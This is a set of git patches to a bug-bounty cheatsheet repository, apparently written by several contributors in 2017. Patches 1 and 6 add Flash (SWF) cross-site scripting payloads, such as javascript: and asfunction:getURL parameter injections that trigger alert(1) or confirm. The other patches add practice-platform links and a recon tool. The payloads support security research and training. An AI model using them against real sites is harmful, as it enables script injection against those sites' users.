From 74b9508019a8872b0a877478b8f3cd9f1a43dd6a Mon Sep 17 00:00:00 2001 From: Yasin Soliman Date: Sun, 1 Oct 2017 10:19:34 +0100 Subject: [PATCH 1/8] [XSS] add extra SWF refs from notes --- cheatsheets/xss.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cheatsheets/xss.md b/cheatsheets/xss.md index 9fd8b26..c2d7b76 100644 --- a/cheatsheets/xss.md +++ b/cheatsheets/xss.md @@ -128,6 +128,10 @@ javas cript://www.google.com/%0Aalert(1) - Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()` +- AutoDemo: `control.swf?onend=javascript:alert(1)//` + +- Adobe FLV Progressive: `/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//` and `/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//` + - Banner.swf (generic): `banner.swf?clickTAG=javascript:alert(document.domain);//` - JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)` @@ -136,7 +140,7 @@ javas cript://www.google.com/%0Aalert(1) - FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf` -_Note: Useful reference on SWF XSS construction from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._ +_Note: Useful reference on constructing Flash-based XSS payloads from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._ **Lightweight Markup Languages** From 77f7f160372883bee305f977347579c60b5327cb Mon Sep 17 00:00:00 2001 From: Martijn X1M Date: Sun, 1 Oct 2017 16:10:28 +0200 Subject: [PATCH 2/8] added practice platforms --- cheatsheets/practice-platforms.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 cheatsheets/practice-platforms.md diff --git a/cheatsheets/practice-platforms.md b/cheatsheets/practice-platforms.md new file mode 100644 index 0000000..22dcb8f --- /dev/null +++ b/cheatsheets/practice-platforms.md @@ -0,0 +1,5 @@ +## Practice Platforms + +- [Pentesterlab](https://pentesterlab.com/) +- [XSS Game](https://xss-game.appspot.com/) +- [Hack This Site](https://www.hackthissite.org) From bdc7d94601a737d6786839b11b3bea46386ae9cd Mon Sep 17 00:00:00 2001 From: EdOverflow Date: Sun, 1 Oct 2017 16:22:37 +0200 Subject: [PATCH 3/8] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 921f75d..6762a76 100644 --- a/README.md +++ b/README.md @@ -4,6 +4,7 @@ - [Books](cheatsheets/books.md) - [Special Tools](cheatsheets/special-tools.md) - [Recon](cheatsheets/recon.md) +- [Practice Platforms](cheatsheets/practice-platforms.md) - [XSS](cheatsheets/xss.md) - [SQLI](cheatsheets/sqli.md) - [SSRF](cheatsheets/ssrf.md) From 41adf2c5ba9f467f7723d415c94b536bfa84dc35 Mon Sep 17 00:00:00 2001 From: nodauf Date: Sun, 1 Oct 2017 20:09:43 +0200 Subject: [PATCH 4/8] Add new pratice platforms --- cheatsheets/practice-platforms.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cheatsheets/practice-platforms.md b/cheatsheets/practice-platforms.md index 22dcb8f..cff88c5 100644 --- a/cheatsheets/practice-platforms.md +++ b/cheatsheets/practice-platforms.md @@ -3,3 +3,5 @@ - [Pentesterlab](https://pentesterlab.com/) - [XSS Game](https://xss-game.appspot.com/) - [Hack This Site](https://www.hackthissite.org) +- [Root-Me](https://www.root-me.org) +- [HackTheBox](https://www.hackthebox.eu) From b874b1a5c5214fbd9f925cd47d51223107126ead Mon Sep 17 00:00:00 2001 From: EdOverflow Date: Sun, 1 Oct 2017 20:20:23 +0200 Subject: [PATCH 5/8] Add link to contributors page. --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 6762a76..ee987dd 100644 --- a/README.md +++ b/README.md @@ -54,3 +54,4 @@ We like to keep our Markdown files as uniform as possible. So if you submit a PR - [yasinS](https://github.com/yasinS) - [neutrinoguy](https://github.com/neutrinoguy) - [kuromatae](https://github.com/kuromatae) +- [And many more ...](https://github.com/EdOverflow/bugbounty-cheatsheet/graphs/contributors) From b8f3aa96e31a428b34c7601f31cd8873b03a3939 Mon Sep 17 00:00:00 2001 From: Yasin Soliman Date: Sun, 1 Oct 2017 22:04:49 +0100 Subject: [PATCH 6/8] [XSS] add video-js example variant --- cheatsheets/xss.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cheatsheets/xss.md b/cheatsheets/xss.md index c2d7b76..26f0eae 100644 --- a/cheatsheets/xss.md +++ b/cheatsheets/xss.md @@ -120,7 +120,7 @@ javas cript://www.google.com/%0Aalert(1) - FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert`1` -- videoJS: `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29` +- videoJS: `video-js.swf?readyFunction=confirm` and `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29` - YUI "io.swf": `io.swf?yid=\"));}catch(e){alert(document.domain);}//` From 836b8b9a66d64d4fccdfa3ba7a433cc37ecf36b2 Mon Sep 17 00:00:00 2001 From: Nullsxcurity <32492630+Nullsxcurity@users.noreply.github.com> Date: Wed, 4 Oct 2017 13:00:18 +0530 Subject: [PATCH 7/8] Added HackMe & CTF 365 to the list --- cheatsheets/practice-platforms.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cheatsheets/practice-platforms.md b/cheatsheets/practice-platforms.md index cff88c5..fdd8259 100644 --- a/cheatsheets/practice-platforms.md +++ b/cheatsheets/practice-platforms.md @@ -5,3 +5,5 @@ - [Hack This Site](https://www.hackthissite.org) - [Root-Me](https://www.root-me.org) - [HackTheBox](https://www.hackthebox.eu) +- [Hack Me](https://hack.me) +- [CTF 365](https://ctf365.com) From 61d3641a4c0d81229167df3c19d70ee0d20d6997 Mon Sep 17 00:00:00 2001 From: Nullsxcurity <32492630+Nullsxcurity@users.noreply.github.com> Date: Wed, 4 Oct 2017 13:15:20 +0530 Subject: [PATCH 8/8] Updated Reconnaissance list in special-tools.md Added PenTest tools to the list, recon using Google dorks. --- cheatsheets/special-tools.md | 1 + 1 file changed, 1 insertion(+) diff --git a/cheatsheets/special-tools.md b/cheatsheets/special-tools.md index a354f6a..6ca80d3 100644 --- a/cheatsheets/special-tools.md +++ b/cheatsheets/special-tools.md @@ -38,6 +38,7 @@ otherapp.10.0.0.1.nip.io - [VirusTotal](https://virustotal.com/en-gb/domain/google.com/information/) (WHOIS, DNS, and subdomain recon) - [crt.sh](https://crt.sh/?q=%25.uber.com) (SSL certificate search) - [Google CT](https://transparencyreport.google.com/https/certificates) (SSL certificate transparency search) +- [PenTest Tools](https://pentest-tools.com/information-gathering/google-hacking) (Google dorks) **Report Templates**